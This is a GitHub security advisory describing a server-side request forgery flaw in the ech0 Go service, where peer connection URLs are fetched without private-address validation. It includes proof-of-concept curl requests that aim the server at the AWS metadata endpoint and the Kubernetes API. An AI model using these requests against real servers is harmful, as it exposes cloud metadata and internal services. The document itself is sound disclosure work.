GHSA-8mc6-xjpr-h98x HIGH go/github.com/lin-snow/ech0

CVE:

Summary

The fetchPeerConnectInfo function in internal/service/connect/connect.go:214-239 uses httpUtil.SendRequest (no SSRF protection) instead of SendSafeRequest (which has ValidatePublicHTTPURL with private IP blocking). This allows authenticated users to make the server request arbitrary URLs including internal/cloud metadata endpoints.

Details

In internal/service/connect/connect.go, the fetchPeerConnectInfo function:

func fetchPeerConnectInfo(peerConnectURL string, requestTimeout time.Duration) (model.Connect, error) {
    url := httpUtil.TrimURL(peerConnectURL) + "/api/connect"
    resp, err := httpUtil.SendRequest(url, "GET", struct {...}{...}, requestTimeout)

This uses SendRequest which has NO URL validation. The codebase HAS SendSafeRequest at internal/util/http/http.go:228-281 with proper SSRF protection, but fetchPeerConnectInfo does not use it.

Called from:

• Line 307: data, err := fetchPeerConnectInfo(conn.ConnectURL, requestTimeout)
• - Line 498: data, err := fetchPeerConnectInfo(conn.ConnectURL, healthProbeTimeout)

PoC

# 1. Add a connection pointing to AWS metadata service
curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -d '{"connect_url": "http://169.254.169.254/latest/meta-data/instance-id"}'

# 2. Trigger SSRF via health check
curl -H "Authorization: Bearer <token>" \
  "https://ech0.example.com/api/connects/health"
# Returns AWS EC2 instance ID

Or for Kubernetes:

curl -X POST "https://ech0.example.com/api/connects" \
  -H "Authorization: Bearer <token>" \
  -d '{"connect_url": "http://kubernetes.default.svc.cluster.local:443/api"}'

Impact

• Confidentiality: SSRF can access internal services, cloud metadata (AWS IMDSv1, GCE metadata), Kubernetes API
• - CWE-918: Server-Side Request Forgery

📌 来源: GitHub-Advisory | 📅 2026-05-07